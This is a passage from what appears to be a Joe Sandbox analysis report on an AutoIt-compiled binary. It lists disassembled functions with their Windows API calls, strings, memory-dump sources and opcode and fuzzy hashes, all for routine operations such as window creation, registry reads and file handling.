                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e73693b04718870c2a1f0aa012e84b976491703f966f6f032b33f1564be78ee6
                                                              • Instruction ID: 034be5ce57deba273edf3166bc35a797c646bc9c2013fc4ec0273f85529533e3
                                                              • Opcode Fuzzy Hash: e73693b04718870c2a1f0aa012e84b976491703f966f6f032b33f1564be78ee6
                                                              • Instruction Fuzzy Hash: 82C1E671A04345AFDB11EFA8D845BBD7BB0FF59304F184199F824A73A2C7309A42DB69
                                                              Function 00C5353A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,VARGETTYPE,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C53568
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C53589
                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C532EF,?), ref: 00C5359D
                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C532EF,?), ref: 00C535A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$VARGETTYPE$edit
                                                              • API String ID: 1584632944-1624152889
                                                              • Opcode ID: ae0d79ad40049d271ee90f6650289ed4a55f703cd3fd0dbea3980d7975e7fd90
                                                              • Instruction ID: 04ff01021553360936d64117d95cd9b46fe562b8190f51a7757c758a0ef35c5c
                                                              • Opcode Fuzzy Hash: ae0d79ad40049d271ee90f6650289ed4a55f703cd3fd0dbea3980d7975e7fd90
                                                              • Instruction Fuzzy Hash: DCF0FE716403D47AEB3197576C48F373EBDD7DAF50F00002EB905EB260D6691852EAB1
                                                              Function 00C555F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C555EB,SwapMouseButtons,00000004,?), ref: 00C5561C
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C555EB,SwapMouseButtons,00000004,?), ref: 00C5563D
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C555EB,SwapMouseButtons,00000004,?), ref: 00C5565F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: c6fcdd2bc22d84dc3b59c209a15c204720c5416bb0c4ecbdce14d266e2f89a50
                                                              • Instruction ID: 0893f5b8fd704852c4a5a36d3d95638a3b37030927b1813e639cf9fb8c5077bc
                                                              • Opcode Fuzzy Hash: c6fcdd2bc22d84dc3b59c209a15c204720c5416bb0c4ecbdce14d266e2f89a50
                                                              • Instruction Fuzzy Hash: 1F117C79611648FFDB208F64CC80EAF77B8EF00745F444469F806D7220DA719E8597A4
                                                              Function 00CAE71E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00CAE73D
                                                              • FreeLibrary.KERNEL32 ref: 00CAE763
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: GetSystemWow64DirectoryW$X64
                                                              • API String ID: 3013587201-2590602151
                                                              • Opcode ID: 6aba28d735ff7a1c37fd49a598baa9014f1d04503446a162a2a05d07e9c33074
                                                              • Instruction ID: 1295f959afc1e4ebc3a515dcd647bebc54c4b3898edb9bd236e944f789cfc7f2
                                                              • Opcode Fuzzy Hash: 6aba28d735ff7a1c37fd49a598baa9014f1d04503446a162a2a05d07e9c33074
                                                              • Instruction Fuzzy Hash: 86E09B71D059669FDB735A205C98BBD36246F22745F240859F802EA150DB25CD4887D4
                                                              Function 00C5F680 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Variable must be of type 'Object'., xrefs: 00CA486A
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Variable must be of type 'Object'.
                                                              • API String ID: 0-109567571
                                                              • Opcode ID: 70a21f4c7d4fdf89cba59772c880e70a2fe29c044f7c604122df4cd3ee99111d
                                                              • Instruction ID: 6cf459135e6db581a03956961b0402721ea917cbc24e6d6993e2b3587cd098ad
                                                              • Opcode Fuzzy Hash: 70a21f4c7d4fdf89cba59772c880e70a2fe29c044f7c604122df4cd3ee99111d
                                                              • Instruction Fuzzy Hash: 8DC2CF75A00205DFCB28CF58C880BAEB7B1FF49305F248169ED15AB361D374AE86DB95
                                                              Function 00CBDA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00CEDC30), ref: 00CBDABB
                                                              • GetLastError.KERNEL32 ref: 00CBDACA
                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00CBDAD9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CEDC30), ref: 00CBDB36
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                              • String ID:
                                                              • API String ID: 2267087916-0
                                                              • Opcode ID: 9dccbba6a3e5f0a3718256f7e45b3693e80d2cad4366a02ad3fa86740dde3afe
                                                              • Instruction ID: 3bddcf0737670a7150c9d573aa8748219f2a127f042c256a575973c1394ff3fe
                                                              • Opcode Fuzzy Hash: 9dccbba6a3e5f0a3718256f7e45b3693e80d2cad4366a02ad3fa86740dde3afe
                                                              • Instruction Fuzzy Hash: 882192345082459F8700DF24C8819AFBBE4EF55369F144A1DF8ABC72A1E730DE4ADB56
                                                              Function 00C7016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00C709F8
                                                                • Part of subcall function 00C73634: RaiseException.KERNEL32(?,?,?,00C70A1A,?,00000000,?,?,?,?,?,?,00C70A1A,00000000,00D19758,00000000), ref: 00C73694
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00C70A15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341
                                                              • Opcode ID: 5b6cc5ba4e6deb8f19178faf7bd18da0cb71f5cb14dc066925d0fbbcf2c9cb22
                                                              • Instruction ID: f452b3ad08816cacc256eca4119d4f275413b19f09a3784b7b9f36f10e370a7a
                                                              • Opcode Fuzzy Hash: 5b6cc5ba4e6deb8f19178faf7bd18da0cb71f5cb14dc066925d0fbbcf2c9cb22
                                                              • Instruction Fuzzy Hash: 0FF0683450030DF79B04BAB5EC5699DB76C5E00760BB0C160B92C955D3EB70EB56D7D1
                                                              Function 00CAE59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: %.3d$X64
                                                              • API String ID: 481472006-1077770165
                                                              • Opcode ID: 6ce1720403a2c9d590a9fb67719ff661f0b5526a55567c5f00481025a35d89b9
                                                              • Instruction ID: d790809b8c7ba6cdccb49fba59c8be12551598986420b5e408764600a73d235c
                                                              • Opcode Fuzzy Hash: 6ce1720403a2c9d590a9fb67719ff661f0b5526a55567c5f00481025a35d89b9
                                                              • Instruction Fuzzy Hash: 8ED012A1C0801EE9CBA09AD1E8889BD737CA719304F108853F506D2040EA349548A761
                                                              Function 00CD88B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00CD8C52
                                                              • TerminateProcess.KERNEL32(00000000), ref: 00CD8C59
                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00CD8E3A
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                              • String ID:
                                                              • API String ID: 146820519-0
                                                              • Opcode ID: 0a22b4cf6d55f4492f231014e12dcf7319feec0e6f0367cc83f4c37eb7390272
                                                              • Instruction ID: e4b41b8c735738f2e38ac6a61519c3d6cfdb975134f110da15c5f8ce20681fa7
                                                              • Opcode Fuzzy Hash: 0a22b4cf6d55f4492f231014e12dcf7319feec0e6f0367cc83f4c37eb7390272
                                                              • Instruction Fuzzy Hash: 6D125A75A083419FC714DF28C484B2ABBE5FF85314F14895EE9998B392CB31E949CF92
                                                              Function 00C52735 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C53236
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C5323E
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C53249
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C53254
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C5325C
                                                                • Part of subcall function 00C53205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C53264
                                                                • Part of subcall function 00C5318C: RegisterWindowMessageW.USER32(00000004,?,00C52906), ref: 00C531E4
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C529AC
                                                              • OleInitialize.OLE32 ref: 00C529CA
                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00C939E7
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID:
                                                              • API String ID: 1986988660-0
                                                              • Opcode ID: bf6deada88845f710396bc288384d49452f1be5851b8713c1ad4abd824947e02
                                                              • Instruction ID: 72a1e62e6a184ef65a53bfced8446b965b2f0711b18e3ddd032c4e98e7707854
                                                              • Opcode Fuzzy Hash: bf6deada88845f710396bc288384d49452f1be5851b8713c1ad4abd824947e02
                                                              • Instruction Fuzzy Hash: A171AFB4901344AE87A8EF79EC696357AE0BB78305390822AF419C7372EB308547DF75
                                                              Function 00C56BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00C56CA1
                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00C56CB1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: b9e2a928352bce5da3afa2660672e81a779b082ee0e9bdee55f7ea115cdb17d8
                                                              • Instruction ID: 7fd9235f52dbc5f65f2a9ded7caab31ad07c7ae7e13ce07aa3c63efaae5b2d45
                                                              • Opcode Fuzzy Hash: b9e2a928352bce5da3afa2660672e81a779b082ee0e9bdee55f7ea115cdb17d8
                                                              • Instruction Fuzzy Hash: DA315A75A00609EFDB14CF6DC980B99B7B5FB04315F148629EC2597340C7B1BE98DB94
                                                              Function 00C6FCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00C55F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C56049
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00C6FD44
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C6FD53
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CAFDD3
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer$Kill
                                                              • String ID:
                                                              • API String ID: 3500052701-0
                                                              • Opcode ID: cc863587bffd066d17fad58df6093af7481de81d6540dbc1ff2abd6453cabb55
                                                              • Instruction ID: 71dc9004d94ff00487f9aacb8fffbc8b7a0ab9197afda961f1a36dc4a1a61dd3
                                                              • Opcode Fuzzy Hash: cc863587bffd066d17fad58df6093af7481de81d6540dbc1ff2abd6453cabb55
                                                              • Instruction Fuzzy Hash: 5A31B171904344AFEB33CF648895BEABBECAF12308F0004AEE5DA97241C7745A86CB51
                                                              Function 00C88A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(00000000,00000000,?,?,00C8895C,?,00D19CE8,0000000C), ref: 00C88A94
                                                              • GetLastError.KERNEL32(?,00C8895C,?,00D19CE8,0000000C), ref: 00C88A9E
                                                              • __dosmaperr.LIBCMT ref: 00C88AC9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                              • String ID:
                                                              • API String ID: 2583163307-0
                                                              • Opcode ID: f03e891cc801fb1f632790271c2237fb1834956143f13e071687a24fed79c1ca
                                                              • Instruction ID: b940c7a5863187fc5f41c2a1b6811e693fb8a02844933ed549c58d8d3f87820f
                                                              • Opcode Fuzzy Hash: f03e891cc801fb1f632790271c2237fb1834956143f13e071687a24fed79c1ca
                                                              • Instruction Fuzzy Hash: C8018E336052604AD62C73745885BFE27495F81B3CF69021BF838CB5D2DEA0DD89B398
                                                              Function 00C8971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00C897CA,FF8BC369,00000000,00000002,00000000), ref: 00C89754
                                                              • GetLastError.KERNEL32(?,00C897CA,FF8BC369,00000000,00000002,00000000,?,00C85EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C76F61), ref: 00C8975E
                                                              • __dosmaperr.LIBCMT ref: 00C89765
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                              • String ID:
                                                              • API String ID: 2336955059-0
                                                              • Opcode ID: 901270df904f03511b584b65e58dad7b7bf2967683420abd595cdab44ff1dea6
                                                              • Instruction ID: 84c9cbcde1619f4dcde799d5b30f948c3e847c7ee5ab7f7aedd3e37511e8f2d5
                                                              • Opcode Fuzzy Hash: 901270df904f03511b584b65e58dad7b7bf2967683420abd595cdab44ff1dea6
                                                              • Instruction Fuzzy Hash: 4C017037620514AFCB05AFA9DC45D7F3B2AEF85334B280259F825CB190EA70DD01D790
                                                              Function 00C5F1E8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TranslateMessage.USER32(?), ref: 00C5F22B
                                                              • DispatchMessageW.USER32(?), ref: 00C5F239
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C5F24F
                                                              • Sleep.KERNELBASE(0000000A), ref: 00C5F261
                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00CA327C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                              • String ID:
                                                              • API String ID: 3288985973-0
                                                              • Opcode ID: 69efc255f6f53fc8d487259ea0b2aa50038acb76d894ffbdb48e8d4c1508dd72
                                                              • Instruction ID: af21e3537f5b461d4c84a18505ef0d6f11e83c01f77331e8fa1a71cf2459f40d
                                                              • Opcode Fuzzy Hash: 69efc255f6f53fc8d487259ea0b2aa50038acb76d894ffbdb48e8d4c1508dd72
                                                              • Instruction Fuzzy Hash: 70F089705043819BF7348760DC89FEA73ACAB44305F000628F65AC70C0DB70968DCB25
                                                              Function 00C62AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 00C62FB6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Init_thread_footer
                                                              • String ID: CALL
                                                              • API String ID: 1385522511-4196123274
                                                              • Opcode ID: a2eba15aa4dd778b9af68f0e212347ee25c12f7257aa270a3f47a64b6b9aeca2
                                                              • Instruction ID: ecb523517434d811458182ed7847c5162cf38fb5f3d71985fca8124553fb07ad
                                                              • Opcode Fuzzy Hash: a2eba15aa4dd778b9af68f0e212347ee25c12f7257aa270a3f47a64b6b9aeca2
                                                              • Instruction Fuzzy Hash: FD228B70608642DFC724DF14C880B2ABBF1BF99314F24895DF49A8B3A2D772E945DB52
